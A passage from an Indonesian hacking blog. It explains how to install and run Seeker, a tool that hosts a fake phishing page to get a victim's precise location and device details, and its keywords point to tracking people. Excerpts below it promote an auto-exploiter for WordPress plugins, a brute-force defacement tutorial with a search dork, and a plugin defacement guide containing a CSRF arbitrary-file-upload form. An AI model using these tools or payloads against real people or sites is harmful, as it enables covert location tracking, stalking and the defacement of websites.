Skip to main content

Melacak Lokasi Dengan Akurat Menggunakan Website Palsu

squadcyber - Konsep di balik Seeker sederhana, sama seperti kalian menghosting laman phishing untuk mendapatkan kredensial mengapa tidak menghosting laman palsu yang meminta lokasi kalian seperti banyak situs web berbasis lokasi populer.
 
Seeker Menghosting situs web palsu di Apache Server dan menggunakan Ngrok, situs web meminta Izin Lokasi dan jika pengguna mengizinkannya, kita bisa mendapatkan:

  • Longitude
  • Latitude
  • Accuracy
  • Altitude - Not always available
  • Direction - Only available if user is moving
  • Speed - Only available if user is moving
Bersama dengan Informasi Lokasi, Seeker juga mendapatkan Informasi Perangkat tanpa izin:
  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM - Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address
 Alat ini murni Proof of Concept dan hanya untuk Keperluan Pendidikan, Seeker menunjukkan data apa yang dapat dikumpulkan oleh situs web jahat tentang Anda dan perangkat Anda dan mengapa Anda tidak perlu mengeklik tautan acak dan mengizinkan izin penting seperti Lokasi dll.
  • Tool dan layanan lain menawarkan IP Geolocation yang tidak terlalu akurat dan tidak memberikan lokasi pengguna.
  • Umumnya jika pengguna menerima lokasi permisi, Akurasi informasi yang diterima akurat hingga sekitar 30 meter.
 Catatan: Pada iPhone karena beberapa alasan akurasi lokasi sekitar 65 meter.

Tested On 

  • Kali Linux 2018.2
  • Ubuntu 18.04
  • Arch Linux based Distro
  • Termux
  • Kali Linux (WSL)

 Cara Install dan Menggunakan Seeker

Kali Linux/Ubuntu
$ git clone https://github.com/thewhiteh4t/seeker.git
$ cd seeker/
$ chmod 777 install.sh
$ ./install.sh

$ python seeker.py

Arch Based Distro
# Install docker

$ pacman -Syy
$ pacman -S docker
$ systemctl start docker.service

# Build Seeker
$ cd seeker/
$ docker build -t seeker .

# Launch seeker
$ docker run -t --rm seeker

Termux
$ cd seeker/termux
$ chmod 777 install.sh
$ ./install.sh

$ python seeker.py

Video

Baca Juga : Cara Melacak Lokasi Seseorang Dengan Akurat
cara melacak lokasi dengan akurat cara melacak lokasi seseorang cara install seeker cara install seeker di termux cara melacak lokasi dengan android cara melacak lokasi dengan termux cara melacak lokasi dengan linux cara melacak android dengan termux cara install seeker di linux cara install seeker di android cara melacak dengan termux cara melacak seseorang dengan termux cara melacak pengguna instagram cara melacak ip dengan termux ip geo location cara melacak ip cara melacak facebook cara phising lokasi script pihising lokasi

Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...